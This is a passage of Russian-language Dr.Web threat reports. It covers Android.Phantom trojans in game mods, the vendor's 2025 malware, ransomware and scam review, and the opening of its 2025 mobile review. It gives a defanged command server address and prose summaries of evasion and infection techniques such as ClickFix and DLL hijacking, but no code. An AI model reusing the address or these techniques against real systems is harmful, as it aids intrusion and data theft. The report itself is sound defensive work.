По ссылке скачивается рабочий мод. Его код защищен коммерческим упаковщиком, внутри которого скрывается троян Android.Phantom.1.origin. Это загрузчик удаленного кода, по команде с сервера hxxps[:]//dllpgd[.]click он загружает уже нам знакомые Android.Phantom.2.origin, Android.Phantom.5 и троян-шпион Android.Phantom.5.origin. Последний отправляет информацию об устройстве злоумышленникам, в том числе номер телефона, геолокацию, список установленных приложений.

Этот скриншот с сервера показывает, на каких языках говорят пользователи, которые становятся объектами заражения. Для доступа к чатам на языках, отличных от английского, необходимо поставить реакцию с соответствующим флагом. Больше всего отметились пользователи, говорящие на испанском, французском, немецком, польском и итальянском языках (не считая английского, который является основным языком сервера). Также администраторы сервера не предусмотрели чатов для многих стран Азии.

Трояны могут нанести существенный вред владельцам зараженных устройств. Перечислим несколько возможных исходов:

Невольное соучастие. Смартфон пользователя может быть использован в качестве бота при DDoS-атаке, тем самым делая владельца невольным соучастником киберпреступления.
Незаконная активность. Через устройство злоумышленники могут совершать незаконную онлайн-деятельность, к примеру, использовать смартфон в мошеннических схемах или рассылать спам-сообщения.
Повышенное потребление заряда и трафика. Посторонняя деятельность разряжает аккумулятор и расходует интернет-трафик.
Утечка персональных данных. Android.Phantom.5.origin является шпионом и может передавать данные об устройстве и владельце.

Трояны этого семейства представляют угрозу для владельцев мобильных устройств на Android, не защищенных актуальным антивирусным ПО. Российские пользователи испытывают трудности с регистрацией в зарубежных приложениях или оплатой подписок. Ситуация подталкивает искать и использовать альтернативные, зачастую полулегальные, способы получения услуг этих компаний. Эта ситуация на руку вирусописателям, ведь пользователям приходится рисковать и доверять сомнительным вариантам. Особую группу риска составляют дети, которые не думают о правилах цифровой гигиены, желая всего лишь поиграть, послушать музыку или посмотреть видеоклипы.

Мы рекомендуем не скачивать моды на сомнительных сайтах и в каналах. Как правило, проверка источников модов или приложений требует времени, опыта и насмотренности. Поэтому лучший вариант обеспечить себе и своим близким гарантированное спокойствие — использовать Dr.Web Security Space для мобильных устройств. Он защитит не только ваши смартфоны, но и другие умные устройства: игровые консоли, планшеты, smartTV.

Индикаторы компрометации
Подробнее о Android.Phantom.1.origin
Подробнее о Android.Phantom.2.origin
Подробнее о Android.Phantom.3
Подробнее о Android.Phantom.4.origin
Подробнее о Android.Phantom.5
Подробнее о Android.Phantom.5.origin

«Доктор Веб»: обзор вирусной активности за 2025 год

Thu, 15 Jan 2026 00:00:00 GMT

15 января 2026 года

В 2025 году одними из самых активных угроз стали трояны, предназначенные для показа рекламы. Пользователи также сталкивались с различными вредоносными скриптами и троянскими приложениями, которые запускают в инфицированной системе другое вредоносное ПО. В почтовом трафике чаще всего выявлялись троянские программы-загрузчики, бэкдоры, эксплойты, вредоносные скрипты и фишинговые документы.

Среди мобильных угроз наибольшее распространение получили рекламные трояны и программы-подделки, используемые в различных мошеннических схемах. Также отмечался рост активности банковских троянов. При этом вирусные аналитики «Доктор Веб» обнаружили десятки новых вредоносных, нежелательных и рекламных программ в каталоге Google Play.

По сравнению с 2024 годом сократилось количество обращений пользователей за расшифровкой файлов. В то же время в течение года наши интернет-аналитики фиксировали рост числа мошеннических сайтов, созданных для кражи учетных записей пользователей мессенджера Telegram. Кроме того, распространение вновь получили нежелательные сайты финансовой тематики.

В 2025 году антивирусная лаборатория «Доктор Веб» расследовала несколько таргетированных атак, одна из которых была совершена на российское машиностроительное предприятие. В ходе нее злоумышленники использовали ряд вредоносных приложений, с помощью которых пытались получить конфиденциальные данные с зараженных компьютеров. Наши специалисты установили, что к атаке была причастна хакерская группировка Scaly Wolf. Другой инцидент произошел с одним из российских государственных учреждений, которое подверглось нападению хакерской группы Cavalry Werewolf. Вирусные аналитики «Доктор Веб» выявили множество вредоносных инструментов злоумышленников, а также изучили особенности группировки и характерные для нее действия внутри скомпрометированных сетей.

В течение 2025 года компания «Доктор Веб» также сообщала о ряде других инцидентов информационной безопасности. В январе наша антивирусная лаборатория выявила активную кампанию по добыче криптовалюты Monero, организованную с использованием множества различных вредоносных программ. А в апреле мы проинформировали о трояне, найденном в прошивке ряда моделей Android-смартфонов. С его помощью киберпреступники похищали криптовалюту. Кроме того, в апреле наши специалисты выявили Android-трояна, которого злоумышленники внедрили в одну из версий популярной картографической программы и использовали для слежки за российскими военнослужащими.

В июле эксперты «Доктор Веб» рассказали о новом семействе троянов, созданных для кражи криптовалюты и паролей. Злоумышленники распространяли их под видом модов, читов и патчей для игр. В августе вирусные аналитики предупредили о распространении многофункционального бэкдора для мобильных устройств, который был нацелен на представителей российского бизнеса. Киберпреступники управляли им дистанционно, похищая с его помощью конфиденциальные данные и следя за жертвами.

В октябре мы рассказали о бэкдоре для Android-устройств, которого киберпреступники распространяют в составе модифицированных версий мессенджера Telegram X. Эта вредоносная программа похищает логины и пароли от учетных записей Telegram и другие конфиденциальные данные. С ее помощью вирусописатели могут управлять взломанными аккаунтами жертв и полностью контролировать сам мессенджер, выполняя различные действия от имени пользователей.

В декабре на нашем сайте вышел материал о трояне, который «накручивает» популярность сайтов и для этого притворяется человеком, чтобы его действия не заблокировала антибот-защита интернет-площадок. Вредоносная программа самостоятельно ищет нужные сайты в поисковых системах, открывает их и выполняет клики на веб-страницах в соответствии с получаемыми от злоумышленников параметрами.

В 2025 году также отмечался рост популярности атак ClickFix, при которых злоумышленники применяют социальную инженерию, чтобы пользователи самостоятельно запустили вредоносный код на своих устройствах.

Главные тенденции года

Отмечалась высокая активность рекламных троянов
Произошли новые таргетированные атаки
Наблюдался рост популярности атак с применением метода ClickFix
Снизилось число инцидентов с троянскими программами-шифровальщиками
Увеличилось количество детектирований банковских троянов для Android
Были выявлены новые случаи заражения прошивок Android-устройств
В каталоге Google Play вновь распространялись различные вредоносные и нежелательные программы

Наиболее интересные события 2025 года

В январе 2025 года специалисты «Доктор Веб» выявили кампанию по добыче криптовалюты Monero с использованием вредоносного майнера SilentCryptoMiner. Его файлы были замаскированы под различное ПО, например программы для совершения видеозвонков. При заражении компьютеров они удаляли другие майнеры, которые могли быть ранее установлены в систему. В рамках этой кампании для распространения некоторых вредоносных компонентов злоумышленники применяли стеганографию — прием, позволяющий скрыть одни данные среди других (например, в изображениях). После скачивания специальным образом сформированных изображений соответствующие компоненты SilentCryptoMiner извлекались из них и запускались.

В апреле наши вирусные аналитики проинформировали о трояне Android.Clipper.31, обнаруженном в прошивке ряда бюджетных моделей Android-смартфонов. Злоумышленники встроили его в модифицированную версию мессенджера WhatsApp, который затем предустановили на устройства, скомпрометировав цепочку поставок некоторых производителей. Android.Clipper.31 перехватывает отправляемые и принимаемые в мессенджере сообщения, ищет в них адреса криптокошельков Tron и Ethereum и заменяет их адресами, которые принадлежат киберпреступникам. При этом троян скрывает подмену, и жертвы видят в таких сообщениях корректные адреса криптокошельков.

В этом же месяце эксперты «Доктор Веб» обнаружили Android-трояна Android.Spy.1292.origin, которого злоумышленники внедрили в одну из версий картографической программы Alpine Quest и использовали для слежки за российскими военнослужащими. Вредоносное приложение собирало конфиденциальную информацию и позволяло атакующим красть файлы с зараженных устройств.

В июле на сайте компании «Доктор Веб» вышел материал о троянских программах Trojan.Scavenger, предназначенных для кражи криптовалюты и паролей. Злоумышленники распространяли их под видом модов, читов и патчей для игр. Эти вредоносные приложения запускались с использованием легитимного ПО, в том числе через эксплуатацию в нем уязвимостей класса DLL Search Order Hijacking.

В августе наши специалисты уведомили о распространении многофункционального бэкдора Android.Backdoor.916.origin, который был нацелен на представителей российских компаний. Вредоносное приложение под видом антивируса распространялось через личные сообщения в мессенджерах. Попадая на целевые устройства, Android.Backdoor.916.origin собирал конфиденциальные данные и позволял атакующим следить за жертвами.

Кроме того, в августе антивирусная лаборатория «Доктор Веб» выпустила исследование таргетированной атаки группировки Scaly Wolf на российское машиностроительное предприятие. Киберпреступники задействовали целый набор вредоносных инструментов, среди которых одним из основных стал модульный бэкдор Updatar. Он позволял атакующим собирать конфиденциальные данные с зараженных компьютеров.

В октябре эксперты «Доктор Веб» рассказали о бэкдоре Android.Backdoor.Baohuo.1.origin, встроенном в модифицированные злоумышленниками версии мессенджера Telegram X. Android.Backdoor.Baohuo.1.origin крадет логины и пароли от учетных записей Telegram, а также похищает ряд других конфиденциальных данных. Вредоносная программа позволяет злоумышленникам получить полный контроль над учетной записью пользователя и управлять мессенджером, выполняя в нем действия от имени жертвы. Например, атакующие могут незаметно вступать в Telegram-каналы и покидать их, а также скрывать новые авторизованные устройства в интерфейсе троянской модификации Telegram X.

В ноябре мы опубликовали исследование таргетированной атаки хакерской группировки Cavalry Werewolf на российское государственное учреждение. При анализе инцидента эксперты «Доктор Веб» обнаружили множество вредоносных инструментов киберпреступников, включая инструменты с открытым исходным кодом. Вирусные аналитики изучили особенности группировки и выяснили, что ее участники предпочитают использовать бэкдоры с функциональностью обратного шелла и часто применяют Telegram API для управления зараженными компьютерами. Кроме того, они начинают атаки с отправки фишинговых писем якобы от имени государственных структур и прикрепляют к таким сообщениям вредоносное ПО, замаскированное под различные официальные документы.

В декабре компания «Доктор Веб» опубликовала анализ вредоносного приложения Trojan.ChimeraWire, который искусственно увеличивает популярность сайтов, притворяясь для этого человеком. Троянское приложение ищет нужные сайты в поисковых системах Google и Bing, открывает их и выполняет клики на загруженных веб-страницах в соответствии с полученными от злоумышленников заданиями. Trojan.ChimeraWire устанавливается на компьютеры при помощи ряда вредоносных программ, которые эксплуатируют уязвимости класса DLL Search Order Hijacking.

В течение 2025 года наблюдался рост популярности атак с использованием метода ClickFix. Он заключается в том, что злоумышленники применяют социальную инженерию, обманом подталкивая потенциальных жертв к самостоятельному запуску вредоносного кода. Когда пользователи попадают на вредоносный или скомпрометированный сайт, тот сообщает им о якобы возникшей ошибке или о необходимости обновить браузер и предлагает «исправить» проблему. Для этого, в зависимости от варианта атаки, пользователей просят либо скопировать указанные на странице строки, либо просто нажать на соответствующую кнопку (например, «Обновить» или «Исправить»). В последнем случае нужное содержимое будет автоматически скопировано в буфер обмена. Затем их просят запустить командную строку или терминал PowerShell, вставить туда содержимое буфера обмена и нажать клавишу Enter. В результате жертвы самостоятельно исполняют вредоносный код, который запускает цепочку заражения компьютера. Подробнее об атаках ClickFix можно узнать в соответствующем материале на нашем сайте.

Вирусная обстановка

По данным статистики детектирований антивируса Dr.Web, в 2025 году общее число обнаруженных угроз возросло на 5,45% по сравнению с 2024 годом. Число уникальных угроз снизилось на 15,89%. Чаще всего пользователи сталкивались с различными вредоносными скриптами и рекламными троянами. Кроме того, распространение получили трояны, которые используются для запуска других вредоносных программ. Также пользователям вновь угрожали троянские приложения, которые созданы на скриптовом языке AutoIt и распространяются в составе другого вредоносного ПО для затруднения его обнаружения.

VBS.KeySender.6
VBS.KeySender.7: Вредоносный скрипт, который в бесконечном цикле ищет окна с текстом mode extensions, разработчика и розробника и шлет им событие нажатия кнопки Escape, принудительно закрывая их.
Trojan.BPlug.4242: Детектирование вредоносного компонента браузерного расширения WinSafe. Этот компонент представляет собой сценарий JavaScript, который демонстрирует навязчивую рекламу в браузерах.
Trojan.Starter.8319
Trojan.Starter.8326
Trojan.Starter.8332: Детектирование вредоносных XML-скриптов, которые запускают трояна Trojan.AutoIt.289 и его компоненты.
JS.Siggen5.44590: Вредоносный код, добавленный в публичную JavaScript-библиотеку es5-ext-main. Демонстрирует определенное сообщение, если пакет установлен на сервер с часовым поясом российских городов.
Trojan.Siggen30.53926: Хост-процесс модифицированного злоумышленниками фреймворка Electron, мимикрирующий под компонент приложения Steam (Steam Client WebHelper) и загружающий JavaScript-бэкдор.
JS.MalVpn.1: Вредоносный скрипт, который различные вредоносные программы используют для соединения с управляющими серверами.
Trojan.Siggen31.34463: Троян, написанный на языке программирования Go и предназначенный для загрузки в целевую систему различных майнеров и рекламного ПО. Вредоносная программа является DLL-файлом и располагается в %appdata%\utorrent\lib.dll. Для своего запуска эксплуатирует уязвимость класса DLL Search Order Hijacking в торрент-клиенте uTorrent.

В почтовом трафике в 2025 году чаще всего встречались троянские программы, которые скачивали и устанавливали другое вредоносное ПО. Злоумышленники также распространяли через электронные письма различные бэкдоры, эксплойты, фишинговые документы и вредоносные скрипты.

W97M.DownLoader.2938: Семейство троянов-загрузчиков, использующих уязвимости документов Microsoft Office. Они предназначены для загрузки других вредоносных программ на атакуемый компьютер.
Exploit.CVE-2017-11882.123
Exploit.CVE-2018-0798.4: Эксплойты для использования уязвимостей в ПО Microsoft Office, позволяющие выполнить произвольный код.
JS.Phishing.684
JS.Phishing.745: Вредоносный сценарий на языке JavaScript, формирующий фишинговую веб-страницу.
BackDoor.AgentTeslaNET.20: Вредоносная программа-шпион, предназначенная для кражи конфиденциальной информации. Например, она собирает и передает злоумышленникам логины и пароли из множества приложений, таких как браузеры, мессенджеры, почтовые клиенты, базы данных и т. д. Она также крадет данные из буфера обмена, реализует функциональность кейлоггера и может создавать снимки экрана (скриншоты).
Win32.Expiro.153: Файловый вирус, заражающий исполняемые файлы Windows. Его основное предназначение заключается в хищении паролей от различных программ.
JS.DownLoader.1225: Эвристическое детектирование для ZIP-архивов, содержащих скрипты JavaScript с подозрительными именами.
Trojan.PackedNET.3223: Детектирование вредоносных программ, защищенных упаковщиком.
Trojan.AutoIt.1413: Детектирование упакованной версии троянской программы Trojan.AutoIt.289, написанной на скриптовом языке AutoIt. Она распространяется в составе группы из нескольких вредоносных приложений: майнера, бэкдора и модуля для самостоятельного распространения. Trojan.AutoIt.289 выполняет различные вредоносные действия, затрудняющие обнаружение основной полезной нагрузки.

Шифровальщики

По сравнению с 2024, в 2025 году в Службу технической поддержки «Доктор Веб» поступило на 35,98% меньше запросов от пользователей, которые пострадали от троянских программ-шифровальщиков. Динамика регистрации запросов на расшифровку файлов представлена на диаграмме ниже.

Наиболее распространенные шифровальщики в 2025 году

Trojan.Encoder.35534 (23,22% обращений пользователей): Шифровальщик, также известный как Mimic. При поиске целевых файлов для шифрования троян использует библиотеку everything.dll легитимной программы Everything, предназначенной для мгновенного поиска файлов на Windows-компьютерах.
Trojan.Encoder.35209 (3,33% обращений пользователей): Шифровальщик, основанный на исходном коде трояна-энкодера Conti. Шифрует файлы при помощи алгоритма ChaCha20. После ликвидации ряда управляющих серверов злоумышленников и раскрытия приватных RSA-ключей шифрования для некоторых модификаций этой вредоносной программы доступна расшифровка затронутых файлов.
Trojan.Encoder.35067 (2,50% обращений пользователей): Шифровальщик, известный как Macop (один из вариантов этого трояна — Trojan.Encoder.30572). Обладает небольшим размером, порядка 30-40 Кбайт. Отчасти это обусловлено тем, что троян не несет с собой сторонних криптографических библиотек, а для шифрования и генерации ключей пользуется исключительно CryptoAPI-функциями. Для шифрования файлов применяет алгоритм AES-256, а сами ключи шифруются RSA-1024.
Trojan.Encoder.41868 (2,31% обращений пользователей): Шифровальщик, артефакты в котором указывают на причастность к его созданию хакерской группировки C77L.
Trojan.Encoder.29750 (2,13% обращений пользователей): Троян-вымогатель, имеющий несколько версий. Его актуальные модификации шифруют файлы алгоритмом AES-256+RSA.

Сетевое мошенничество

В 2025 году интернет-аналитики компании «Доктор Веб» наблюдали рост числа фишинговых сайтов, созданных для кражи учетных записей мессенджера Telegram. Злоумышленники использовали различные схемы: поддельные страницы аутентификации и авторизации, поддельные сообщения от службы поддержки Telegram, предупреждавшие о якобы выявленных нарушениях при использовании мессенджера и необходимости выполнить «проверку» учетной записи, и т. д.

Пример фишингового сайта, сообщающего о необходимости выполнить проверку учетной записи Telegram в связи с неким нарушением условий использования сервиса

Подобные сайты создавались и для пользователей других сервисов, например игровых платформ, интернет-магазинов и т. д. Подделки могли выглядеть как настоящие интернет-ресурсы и предлагали войти в учетную запись. Если пользователи попадались на уловку, конфиденциальная информация оказывалась у злоумышленников.

Поддельный сайт сервиса Steam демонстрирует фишинговую форму для ввода логина и пароля

Пользователи снова сталкивались с различными вариантами мошеннических интернет-ресурсов, которые предлагали всевозможные подарки и бонусы, участие в неких «выгодных акциях». Распространение получили поддельные сайты российских маркетплейсов, где посетители якобы могли принять участие в розыгрыше призов. «Выигрыш» на них был запрограммирован, а для его «получения» от жертвы требовалась определенная оплата, например якобы в виде налога, затем — за доставку товара и его страховку. В других вариантах мошеннической схемы нужный товар якобы отсутствовал, но вместо него предлагался денежный эквивалент. Для «получения» денег пользователь также должен был совершить ряд платежей: в виде пошлины, страховки и т. п. Никакого приза жертва в итоге не получала.

Пример поддельного сайта маркетплейса, предлагающего принять участие в «розыгрыше призов»

Вариантами подобных схем были ориентированные на жителей Великобритании поддельные сайты транспортных компаний. Они предлагали принять участие в розыгрыше транспортных карт, якобы приуроченных к определенному событию и позволяющих бесплатно пользоваться услугами общественного транспорта. После «выигрыша» мошенники просили жертв предоставить персональные данные и оплатить небольшую «комиссию».

Мошеннический сайт якобы от имени транспортной компании предлагает принять участие в «розыгрыше карты»

Актуальными остались всевозможные мошеннические сайты финансовой тематики. Популярными среди злоумышленников снова были ресурсы, предлагавшие зарабатывать торговлей на рынке с использованием автоматизированных систем на базе неких уникальных алгоритмов и технологий искусственного интеллекта. Подобные сайты создаются с ориентиром на жителей многих стран. Чаще всего на них запрашиваются персональные данные для регистрации «заявки» или «учетной записи», после чего информация попадает в руки злоумышленников, которые используют ее по своему усмотрению. В дальнейшем они могут перепродать данные или же продолжат заманивать потенциальную жертву в поддельный инвестиционный сервис, требуя внести деньги на «торговый» счет.

Один из мошеннических сайтов, предлагавших доступ к «инвестиционной платформе» на базе технологий искусственного интеллекта, якобы имел отношение к корпорации Apple

Многие такие сайты построены на базе похожих шаблонов в виде поддельного чата с «виртуальным помощником» или «сотрудником» той или иной компании, якобы от имени которой мошенники обращаются к потенциальной жертве. Пользователем предлагается ответить на ряд вопросов, после чего указать персональные данные.

На одном из сайтов злоумышленники предлагали пользователям из Франции получить доступ к несуществующему автоматизированному торговому ПО TraderAI, который якобы позволит зарабатывать от 3 500€

Один из ресурсов рекламировал инвестиционный сервис, якобы построенный непосредственно на базе мессенджера Telegram. Сайт обещал доход 10 000€ в месяц от автоматической торговли акциями мировых компаний «прямо в телефонном браузере».

Сайт мошенников приглашает присоединиться к «платформе Telegram», которая якобы самостоятельно торгует акциями

Злоумышленники также предлагали потенциальным жертвам заработать при помощи «торговых ботов», якобы созданных при участии крупных компаний и сервисов, таких как Telegram, WhatsApp, TikTok и других.

Пример сайта, который приглашал воспользоваться несуществующим торговым ботом, якобы имеющим отношение к мессенджеру WhatsApp

В течение 2025 года наши интернет-аналитики выявляли новые мошеннические сайты предлагавшие инвестировать в нефтегазовый сектор пользователям многих стран, включая Россию, страны СНГ и Европы. На таких сайтах у потенциальных жертв в большинстве случаев также запрашивается персональная информация: имя, фамилия, номер мобильного телефона, адрес электронной почты и т. д.

Мошеннический сайт, ориентированный на граждан Киргизии, предлагает им «зарабатывать на нефти и газе», обещая крупный доход

Вновь появлялись мошеннические сайты, предлагавшие получить «государственную помощь» в виде выплат или компенсаций. Например, в российском сегменте интернета были распространены мошеннические ресурсы, якобы имеющие отношение к порталу «Госуслуги».

Пример мошеннического сайта, который якобы был связан с сервисом «Госуслуги» и обещал российским пользователям стабильные выплаты от государства и крупной нефтегазовой компании. Для «участия» в программе выплат у жертвы запрашивались персональные данные

Наши специалисты также отметили появление очередных поддельных сайтов образовательных проектов. Они предлагали пользователям пройти различные обучающие курсы, чтобы повысить свою финансовую грамотность, освоить ту или иную профессию т. д. Для «доступа» к обучению у потенциальных жертв, как и во многих других подобных схемах, также запрашивалась персональная информация.

Один из мошеннических сайтов предлагал освоить английский язык

Интернет-аналитики «Доктор Веб» выявляли новые мошеннические сайты по продаже театральных билетов. На таких ресурсах злоумышленники предлагают потенциальным жертвам приобрести билеты по выгодным ценам, однако после «оплаты» пользователи их не получают.

Пример мошеннического сайта, продававшего несуществующие театральные билеты

Кроме того, распространение получили и новые поддельные сайты частных кинотеатров. Как и в случае с билетами в театр, мошенники предлагают потенциальным жертвам купить билеты в кино, но те в итоге лишь отдают свои деньги злоумышленникам.

Поддельный сайт одного из частных кинотеатров

Для мобильных устройств

Согласно статистике детектирований Dr.Web Security Space для мобильных устройств, в 2025 году пользователи Android чаще всего сталкивались с рекламными троянами Android.MobiDash и Android.HiddenAds, а также программами-подделками Android.FakeApp, которые вместо заявленной функциональности могут загружать различные веб-сайты, в том числе мошеннические и вредоносные. Отмечался рост активности троянских приложений Android.Triada. Они представляют собой многофункциональные угрозы, которые злоумышленники встраивают в прошивку Android-устройств. Кроме того, наблюдался рост числа атак банковских троянов Android.Banker. В то же время активность банкеров Android.SpyMax наоборот снизилась.

В минувшем году вирусописатели продолжили использовать различные техники защиты вредоносного ПО для ОС Android. Одной из них был метод конвертации DEX-кода в C-код (известен как DCC или DEX to C).

Самыми распространенными нежелательными приложениями стали программы Program.FakeMoney. Они предлагают пользователям за виртуальные награды выполнять различные задания и обещают возможность конвертировать вознаграждение в настоящие деньги. Но самом деле в них такой возможности нет. Кроме того, на защищаемых устройствах часто детектировались приложения Program.FakeAntiVirus.1 и Program.CloudInject.1. Первые имитируют работу антивирусов и обнаруживают несуществующие угрозы, предлагая «вылечить» заражение, купив полную версию ПО. Вторые представляют собой приложения, которые были модифицированы через популярный облачный сервис. При модификации к ним добавляются опасные системные разрешения и обфусцированный код, назначение которого нельзя проконтролировать.

Программы, которые были модифицированы при помощи утилиты NP Manager (детектируются как Tool.NPMod), стали самым распространенным потенциально опасным ПО. Утилита обфусцирует код модифицируемых приложений и позволяет обходить проверку их цифровой подписи. Наиболее активными рекламными программами в 2025 году были сторонние модификации WhatsApp (Adware.ModAd.1), которые автоматически открывают рекламные ссылки при работе с мессенджером.

В 2025 году были выявлены новые случаи заражения прошивок Android-устройств. Об одном из них наша компания уведомила в апреле. Злоумышленники предустановили вредоносное приложение Android.Clipper.31 в системную область нескольких бюджетных моделей смартфонов и с его помощью похищали криптовалюту пользователей. Еще одним атакующим удалось внедрить опасных троянов Android.Triada в прошивку других моделей Android-смартфонов. Кроме того, были зафиксированы очередные случаи заражения прошивок TV-приставок под управлением Android новыми версиями трояна Android.Vo1d, которого наша компания обнаружила в 2024 году.

В течение минувшего года антивирусная лаборатория «Доктор Веб» выявила ряд опасных вредоносных приложений. В апреле мы рассказали о трояне Android.Spy.1292.origin, который скрывался в модифицированной вирусописателями картографической программе Alpine Quest и атаковал российских военнослужащих. Android.Spy.1292.origin передавал злоумышленникам данные о номере мобильного телефона и учетных записях, собирал контакты из телефонной книги, геолокацию зараженного устройства и сведения о хранящихся на нем файлах. Он также мог похищать определенные файлы по команде атакующих. Тех в первую очередь интересовали конфиденциальные документы, которые передавались через мессенджеры, а также файл журнала локаций программы Alpine Quest.

В августе наши специалисты предупредили о бэкдоре Android.Backdoor.916.origin, которого под видом антивируса злоумышленники распространяли через личные сообщения в мессенджерах. Android.Backdoor.916.origin крадет конфиденциальную информацию и позволяет следить за пользователями. Основной целью этого бэкдора стали сотрудники российского бизнеса.

В октябре мы рассказали о многофункциональном бэкдоре Android.Backdoor.Baohuo.1.origin, которого наши вирусные аналитики обнаружили в модифицированных версиях мессенджера Telegram X. Эта вредоносная программа также используется для кражи конфиденциальных данных, включая логины и пароли от Telegram, входящие СМС, переписку в мессенджере и данные из буфера обмена. При этом бэкдор позволяет злоумышленникам полностью управлять мессенджером и контролировать взломанную учетную запись Telegram жертвы. Для управления бэкдором киберпреступники использовали как C2-сервер, так и базу данных Redis, что ранее не встречалось в Android-угрозах. Android.Backdoor.Baohuo.1.origin преимущественно был нацелен на жителей Индонезии и Бразилии.

Более подробно о вирусной обстановке для мобильных устройств в 2025 году читайте в нашем обзоре.

Перспективы и вероятные тенденции

В новом, 2026 году одной из наиболее распространенных угроз для пользователей, вероятно, останутся рекламные трояны, с помощью которых злоумышленники получают нелегальный доход. Стоит ожидать, что киберпреступники станут чаще использовать банковские троянские приложения, которые также позволяют обогащаться киберпреступникам.

Возможен дальнейший рост популярности различных инструментов и методик, помогающих скрывать вредоносную активность. Среди них можно отметить использование упаковщиков и обфускаторов, применение вредоносных программ-дропперов и многоступенчатых загрузчиков, а также использование стеганографии для сокрытия полезной нагрузки. Кроме того, при создании вредоносного ПО киберпреступники, в том числе с небольшим опытом в программировании, все чаще будут прибегать к помощи ИИ-ассистентов. В результате появятся новые семейства вредоносных программ, а количество угроз возрастет.

Под прицелом вновь окажутся государственные и корпоративные структуры, что выльется в очередные таргетированные атаки. Также вероятны новые случаи заражения прошивок Android-смартфонов, ТВ-приставок и других типов мобильных устройств, особенно в бюджетном сегменте. Сохранится активность интернет-мошенников.

«Доктор Веб»: обзор вирусной активности для мобильных устройств за 2025 год

Thu, 15 Jan 2026 00:00:00 GMT

15 января 2026 года

Главное

В 2025 году пользователи Android-устройств чаще всего сталкивались с рекламными троянами, а также с программами-подделками, которые используются в мошеннических целях.

Самым распространенным нежелательным ПО, как и годом ранее, стали приложения, в игровой форме предлагающие выполнять те или иные задания и получать за это виртуальные награды. Они обещают возможность конвертировать вознаграждение в настоящие деньги, но на самом деле такой возможности в программах не предусмотрено.

Среди потенциально опасного ПО наибольшая активность наблюдалась со стороны приложений, которые были модифицированы при помощи утилиты NP Manager. Она обфусцирует и защищает код модифицируемых программ от анализа и обнаружения, а также позволяет обходить проверку цифровой подписи после их изменения. Наиболее часто детектируемыми рекламными программами стали неофициальные модификации мессенджера WhatsApp, которые автоматически открывают рекламные ссылки при работе с приложением.

В минувшем году были зафиксированы новые случаи внедрения вредоносных программ в прошивку различных моделей Android-устройств. Об одном из них мы рассказали весной 2025 года. Киберпреступникам удалось предустановить троян Android.Clipper.31 на несколько бюджетных моделей смартфонов и с его помощью похищать криптовалюту жертв.

Также весной наши специалисты обнаружили троянскую программу Android.Spy.1292.origin, которую вирусописатели встроили в одну из модифицированных версий картографического ПО Alpine Quest. Вредоносное приложение было нацелено на российских военнослужащих и применялось в целях кибершпионажа.

В конце лета антивирусная лаборатория «Доктор Веб» проинформировала о бэкдоре Android.Backdoor.916.origin, который распространялся через популярные мессенджеры. Злоумышленники использовали его для слежки за сотрудниками российских компаний и сбора их конфиденциальной информации.

А уже осенью мы рассказали об опасном бэкдоре Android.Backdoor.Baohuo.1.origin, которого киберпреступники встроили в модификации мессенджера Telegram X. Эта вредоносная программа позволяла взламывать учетные записи Telegram жертв и управлять самим мессенджером от имени пользователей.

За минувшие 12 месяцев антивирусная лаборатория «Доктор Веб» выявила в каталоге Google Play более 180 угроз, которые в общей сложности были загружены свыше 2 165 000 раз. Среди них были различные варианты троянов, подписывающих пользователей на платные услуги, программы-подделки, которые применяются в мошеннических целях, а также новое рекламное и нежелательное ПО.

В 2025 году вирусописатели продолжили использовать различные техники, направленные на усложнение анализа вредоносных Android-программ и обхода их детектирования антивирусами. Одним из популярных методов было конвертирование DEX-кода в C-код. Кроме того, наши вирусные аналитики отметили, что при создании вредоносного ПО злоумышленники применяют ИИ-ассистентов, которые помогают писать код.

Тенденции прошедшего года

Рекламные трояны вновь стали наиболее распространенными Android-угрозами
Выросла популярность утилиты NP Manager, которая обфусцирует код модифицируемых Android-приложений и позволяет обходить проверку их цифровой подписи после модификации
Возросла активность банковских троянов
Выявлены новые случаи заражения прошивок Android-устройств
Киберпреступники продолжили использовать как уже известные техники для защиты вредоносных программ от детектирования и анализа, так и новые приемы
Вирусописатели активно применяли ИИ-помощников для написания кода вредоносных приложений
Появление новых угроз в каталоге Google Play

Наиболее интересные события 2025 года

В апреле минувшего года эксперты «Доктор Веб» выявили масштабную кампанию по краже криптовалют у владельцев Android-устройств. Злоумышленники получили доступ к цепочке поставок ряда китайских производителей и внедрили в прошивку нескольких бюджетных моделей смартфонов троянскую программу Android.Clipper.31. Вирусописатели встроили ее в модифицированную версию мессенджера WhatsApp. Для модификации использовался инструмент LSPatch, позволяющий менять логику работы приложений без изменения их кода.

Android.Clipper.31 перехватывает отправляемые и принимаемые в мессенджере сообщения, ищет в них адреса криптокошельков Tron и Ethereum и заменяет их адресами, которые принадлежат атакующим. При этом троян скрывает подмену, и в таких сообщениях жертвам демонстрируются корректные кошельки. Android.Clipper.31 также отправляет злоумышленникам все изображения в формате jpg, png и jpeg для поиска в них сохраненных мнемонических фраз, позволяющих получить доступ к криптокошелькам. Киберпреступники встроили Android.Clipper.31 и в десятки других программ, среди которых были популярные приложения криптокошельков, сканеры QR-кодов и прочие мессенджеры, в том числе — Telegram. Эти модификации распространялись через вредоносные сайты.

В 2025 году отмечались и другие случаи проникновения вредоносных программ в системную область Android-устройств. Например, еще одной группе злоумышленников удалось внедрить новые версии опасных троянов Android.Triada в прошивку ряда бюджетных смартфонов. Вредоносные программы Triada опасны тем, что способны заражать системный процесс Zygote. Тот непосредственно участвует в запуске всех приложений в системе, поэтому и трояны Triada в дальнейшем могут внедряться в любое приложение на устройстве, фактически получая над ним полный контроль. Злоумышленники используют этих троянов для загрузки и установки других вредоносных программ, а также нежелательных и рекламных приложений. Кроме того, с их помощью они могут шпионить за жертвами, подписывать их на платные услуги и т. д. Также были выявлены новые случаи заражения прошивок TV-приставок на базе Android новыми версиями трояна Android.Vo1d, которого наша компания обнаружила в 2024 году. Vo1d представляет собой бэкдор, который помещает свои компоненты в системную область зараженных устройств и по команде атакующих способен скрытно скачивать и устанавливать стороннее ПО.

Также в апреле наша антивирусная лаборатория зафиксировала кампанию по распространению трояна-шпиона Android.Spy.1292.origin, нацеленного на российских военнослужащих. Злоумышленники встроили вредоносную программу в одну из версий картографического ПО Alpine Quest и распространяли модификацию через созданный ими Telegram-канал, который выдавали за официальный, а также через один из российских каталогов Android-приложений.

Telegram-канал, через который злоумышленники распространяли вредоносную модификацию Alpine Quest, содержащую Android.Spy.1292.origin

